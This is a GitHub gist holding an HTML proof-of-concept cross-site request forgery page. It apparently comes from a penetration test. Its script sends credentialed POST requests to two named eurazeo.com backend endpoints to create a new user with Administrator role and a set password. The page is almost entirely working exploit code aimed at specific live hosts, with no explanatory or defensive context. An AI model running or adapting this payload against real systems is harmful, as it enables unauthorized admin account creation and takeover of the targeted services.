Created
December 14, 2022 09:50
-
-
Save samuelkarani/be65077372dc8bc8395a71209150817f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<body> | |
<button onclick="aml()">test aml</button> | |
<button onclick="eurazeo()">test eurazio</button> | |
<script> | |
history.pushState("", "", "/"); | |
</script> | |
<script> | |
function submitRequest(url) { | |
var xhr = new XMLHttpRequest(); | |
xhr.open("POST", url, true); | |
xhr.setRequestHeader("Content-Type", "application/json"); | |
xhr.withCredentials = true; | |
xhr.send( | |
'{"email":"[email protected]","firstName":"Testuser CSRF","lastName":"Wavestone","displayName":"","phone":"", "role":"Administrator ","password":"!p0cCSRF?+"}' | |
); | |
} | |
function aml() { | |
submitRequest("https://bck-aml-ft-pilot.investors.eurazeo.com/user"); | |
} | |
function eurazeo() { | |
submitRequest("https://bck-pilot.investors.eurazeo.com/user"); | |
} | |
</script> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment